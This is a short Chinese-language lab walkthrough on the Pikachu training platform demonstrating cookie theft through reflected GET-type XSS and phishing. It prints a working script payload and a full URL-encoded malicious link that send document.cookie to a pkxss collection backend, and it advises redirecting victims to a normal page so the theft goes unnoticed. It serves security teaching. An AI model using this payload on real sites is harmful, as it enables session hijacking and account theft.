cookie获取和钓鱼攻击演示
-
get型XSS利用:cookie获取
-
pkxss管理后台使用介绍
可以独立使用,把它放到某个站点下面 -
它所有数据放到了数据库里面
-
数据接收,用户点击以后不能是空白,得显示一些正常的页面(重定向到可信页面)
-
测试一下构造的URL
<script>document.location= \'http://192.168.0.100/pikachu/pkxss/xcookie/cookie.php?cookie=\' + document.cookie;</script>
这里的地址就是我们cookie的接收后台,顺便把cookie给带过来。
通过JavaScript代码的DOM里面的cookie,获取了用户本地的cookie。
-
由于是get型的,用户可以直接把浏览器上的URL复制粘贴出来。payload就在里面。
http://192.168.0.100/pikachu/vul/xss/xss_reflected_get.php?message=<script>document.location%3D+\'http%3A%2F%2F192.168.0.100%2Fpikachu%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D\'+%2B+document.cookie%3B<%2Fscript>&submit=submit -
查看接收后台,发现用户运行了